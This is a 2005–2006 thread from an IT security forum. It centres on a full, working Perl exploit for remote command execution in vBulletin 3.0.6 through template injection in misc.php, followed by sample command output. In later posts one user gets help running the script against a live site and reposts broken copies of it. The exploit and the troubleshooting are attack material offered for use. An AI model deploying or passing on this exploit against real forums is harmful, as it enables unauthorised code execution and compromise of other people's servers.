Waraxe IT Security Portal
Login or Register
November 22, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 60
Members: 0
Total: 60
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> All other software -> vbulletin <=3.0.6 misc.php remote execution (perl)
Post new topicReply to topic View previous topic :: View next topic
vbulletin <=3.0.6 misc.php remote execution (perl)
PostPosted: Tue Sep 20, 2005 3:27 pm Reply with quote
subzero
Valuable expert
Valuable expert
Joined: Mar 16, 2005
Posts: 42




Quote:
#!/usr/bin/perl

# vBulletin <= 3.0.6 Add templates remote execute exploit (perl)
# suBzero@kisobox.com
# Reference: http://www.securityfocus.com/bid/12622/info
#

use IO::Socket;

if (@ARGV < 3)
{
print q(
[+] vBulletin <= 3.0.6 Add templates
[+] suBzero@kisobox.com
[+] Reference: http://www.securityfocus.com/bid/12622/info
[+] Usage : vbulletin306.pl example.com /forums/ "uname id" ;
);
exit;
}

$serv = $ARGV[0];
$dir = $ARGV[1];
$cmd = $ARGV[2];

$serv =~ s/(http:\/\/)//eg;
print "\n";
print " [+] vBulletin 3.0.6 kisobox.com \r\n";
print " [+] Sending regard to $serv$dir \r\n";
print " [+] Command $cmd \r\n";
print " [+] Exploiting on progress \r\n";

$cmd = "echo _START_;".$cmd.";echo _END_"; #strOke,dont kill me 4 this
$byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
$data = $dir;
$data .= "misc.php?do=page&template={\${passthru($byte)}}";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] Connection error\r\n";

print $sock "GET $data HTTP/1.1\n";
print $sock "Host: $serv\n";
print $sock "Accept: */*\n";
print $sock "Content-Length: ".length($data)." \n".
print $sock "Connection: close\n\n";

$on = 0; #flag

while ($res = <$sock>)
{
if ($res =~ /^_END_/)
{ print "---------------------------------------------\r\n"; exit();}
if ($on == 1) { print "$res"; }
if ($res =~ /^_START_/)
{ $on = 1; }
}
print "[-] Exploit failed \r\n";
print "---------------------------------------------\r\n";


http://kisobox.com/exploits/vbulletin306.txt
save as .pl

example exploit

C:\>perl vbulletin306.pl xxx /forums/ "ls -la"

[+] vBulletin 3.0.6 kisobox.com
[+] Sending regard to xxx/forums/
[+] Command ls -la
[+] Exploiting on progress

1000
total 1204
drwxr-xr-x 15 511 root 4096 Sep 13 15:21 .
drwxrwxr-x 54 wwwuser wwwuser 4096 Jul 18 11:18 ..
-rw------- 1 root root 23910 Sep 19 16:01 DEADJOE
drwxr-xr-x 2 root root 4096 Oct 18 2003 admin
drwxr-xr-x 3 root root 4096 Jan 20 2005 admincp
-rw-r--r-- 1 root root 6694 Jan 20 2005 announcement.php
drwxr-xr-x 2 root root 4096 Jan 20 2005 archive
-rw-r--r-- 1 root root 7394 Jan 20 2005 attachment.php
Code:
View user's profile Send private message Visit poster's website
PostPosted: Sat Feb 25, 2006 11:56 am Reply with quote
lookatmenow
Regular user
Regular user
Joined: Feb 24, 2006
Posts: 21




i downloaded perl, put it in c:\perl

however, when i go to properties for command prompt, i change the starting directory to c:\

which comes up as c:\> when i open it. then i type in perl after that, which gives me c:\>perl

it says ''perl is not recognised as an internal or external command, operable programme or batch file''.

i then went back to the properties of the command prompt and changed the default directory to c:\perl

and when i open command prompt i type in after c:\perl>vbulletin306.pl although this merely opens the vbulletin.pl file in to notepad.

i've tried exectuting the whole line with c:\perl>vbulletin306.pl website.com /forums/ "Is -la" then hit enter... and the same happens, just opens the .pl file in to notepad.

would like to know where i'm going wrong. cheers.
View user's profile Send private message
PostPosted: Sun Feb 26, 2006 4:37 am Reply with quote
subzero
Valuable expert
Valuable expert
Joined: Mar 16, 2005
Posts: 42




go to any open folder >> view >> folder option and disable by clicking the extension disable.

change save file to .pl .
i guess your previous file was saved as vb306.pl.txt.
correct me if im wrong.
View user's profile Send private message Visit poster's website
PostPosted: Sun Feb 26, 2006 11:53 am Reply with quote
lookatmenow
Regular user
Regular user
Joined: Feb 24, 2006
Posts: 21




It's saved as vb306.pl. Although when I look at the properties, it's default program to open with is still 'notepad'. Should that be changed?
View user's profile Send private message
PostPosted: Sun Feb 26, 2006 3:39 pm Reply with quote
lookatmenow
Regular user
Regular user
Joined: Feb 24, 2006
Posts: 21




Quote:

c:\>perl vbulletin306.pl
Backslash found where operator expected at vbulletin306.pl line 1, near "rtf1\"
Backslash found where operator expected at vbulletin306.pl line 1, near "ansi\"
Backslash found where operator expected at vbulletin306.pl line 1, near "ansicpg
1252\"
Backslash found where operator expected at vbulletin306.pl line 1, near "deff0\"

Backslash found where operator expected at vbulletin306.pl line 1, near "f0\"
Backslash found where operator expected at vbulletin306.pl line 1, near "fswiss\
"
syntax error at vbulletin306.pl line 1, near "rtf1\"
syntax error at vbulletin306.pl line 1, near "}}"
Execution of vbulletin306.pl aborted due to compilation errors.


i've got it working now 'perl' that is. However, now there is this error that comes up. Here the script of the vbulletin306.pl file:

Quote:

{\rtf1\ansi\ansicpg1252\deff0\deflang2057{\fonttbl{\f0\fswiss\fcharset0 Arial;}}
{\*\generator Msftedit 5.41.15.1507;}\viewkind4\uc1\pard\f0\fs20 #!/usr/bin/perl\par
\par
# vBulletin <= 3.0.6 Add templates remote execute exploit (perl)\par
# suBzero@kisobox.com\par
# Reference: http://www.securityfocus.com/bid/12622/info\par
#\par
\par
use IO::Socket;\par
\par
if (@ARGV < 3)\par
\{\par
print q(\par
[+] vBulletin <= 3.0.6 Add templates \par
[+] suBzero@kisobox.com\par
[+] Reference: http://www.securityfocus.com/bid/12622/info\par
[+] Usage : vbulletin306.pl example.com /forums/ "uname id" ;\par
); \par
exit;\par
\}\par
\par
$serv = $ARGV[0];\par
$dir = $ARGV[1];\par
$cmd = $ARGV[2];\par
\par
$serv =~ s/(http:\\/\\/)//eg;\par
print "\\n";\par
print " [+] vBulletin 3.0.6 kisobox.com \\r\\n";\par
print " [+] Sending regard to $serv$dir \\r\\n";\par
print " [+] Command $cmd \\r\\n";\par
print " [+] Exploiting on progress \\r\\n";\par
\par
$cmd = "echo _START_;".$cmd.";echo _END_"; #strOke,dont kill me 4 this\par
$byte = join('.', map \{ $_ = 'chr('.$_.')' \} unpack('C*', $cmd)); \par
$data = $dir;\par
$data .= "misc.php?do=page&template=\{\\$\{passthru($byte)\}\}";\par
\par
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] Connection error\\r\\n";\par
\par
print $sock "GET $data HTTP/1.1\\n";\par
print $sock "Host: $serv\\n";\par
print $sock "Accept: */*\\n";\par
print $sock "Content-Length: ".length($data)." \\n".\par
print $sock "Connection: close\\n\\n";\par
\par
$on = 0; #flag\par
\par
while ($res = <$sock>)\par
\{\par
if ($res =~ /^_END_/) \par
\{ print "---------------------------------------------\\r\\n"; exit();\}\par
if ($on == 1) \{ print "$res"; \}\par
if ($res =~ /^_START_/) \par
\{ $on = 1; \}\par
\}\par
print "[-] Exploit failed \\r\\n";\par
print "---------------------------------------------\\r\\n";\par
}


Is the script perhaps wrong? Although it is the one from kisobox.com/exploits/vbulletin306.txt
View user's profile Send private message
PostPosted: Sun Feb 26, 2006 3:47 pm Reply with quote
lookatmenow
Regular user
Regular user
Joined: Feb 24, 2006
Posts: 21




o.k. Feel as though i'm getting closer. Although I now get this error:

Quote:

C:\>perl vb306.pl site.com /forum/ "Is -la"

[+] vBulletin 3.0.6 kisobox.com
[+] Sending regard to site.com/forum/
[+] Command Is -la
[+] Exploiting on progress
Can't locate object method "new" via package "IO::Socket::INET" (perhaps you for
got to load "IO::Socket::INET"?) at vb306.pl line 17.

c:\>


The script I now have in the .pl file is this:

Quote:

$serv = $ARGV[0];
$dir = $ARGV[1];
$cmd = $ARGV[2];

$serv =~ s/(http:\/\/)//eg;
print "\n";
print " [+] vBulletin 3.0.6 kisobox.com \r\n";
print " [+] Sending regard to $serv$dir \r\n";
print " [+] Command $cmd \r\n";
print " [+] Exploiting on progress \r\n";

$cmd = "echo _START_;".$cmd.";echo _END_"; #strOke,dont kill me 4 this
$byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
$data = $dir;
$data .= "misc.php?do=page&template={\${passthru($byte)}}";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] Connection error\r\n";

print $sock "GET $data HTTP/1.1\n";
print $sock "Host: $serv\n";
print $sock "Accept: */*\n";
print $sock "Content-Length: ".length($data)." \n".
print $sock "Connection: close\n\n";

$on = 0; #flag

while ($res = <$sock>)
{
if ($res =~ /^_END_/)
{ print "---------------------------------------------\r\n"; exit();}
if ($on == 1) { print "$res"; }
if ($res =~ /^_START_/)
{ $on = 1; }
}
print "[-] Exploit failed \r\n";
print "---------------------------------------------\r\n";


Sorry about the number of posts. I'm quite the spammer Wink
View user's profile Send private message
PostPosted: Sun Feb 26, 2006 4:11 pm Reply with quote
lookatmenow
Regular user
Regular user
Joined: Feb 24, 2006
Posts: 21




Sorted. Wink

I used the text from your quote in that first post, and made that the 'vb306.pl' file. I finally get to the 'exploit part', however I always get 'exploit failed', without the rest of the text following:

Quote:

c:\>perl vb306.pl site.com /forums/ "Is -la"

[+] vBulletin 3.0.6 kisobox.com
[+] Sending regard to site.com/forums/
[+] Command Is -la
[+] Exploiting on progress
[-] Exploit failed
---------------------------------------------

c:\>


Does this mean their forums are patched, to stop this exploit?
View user's profile Send private message
vbulletin <=3.0.6 misc.php remote execution (perl)
www.waraxe.us Forum Index -> All other software
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.036 Seconds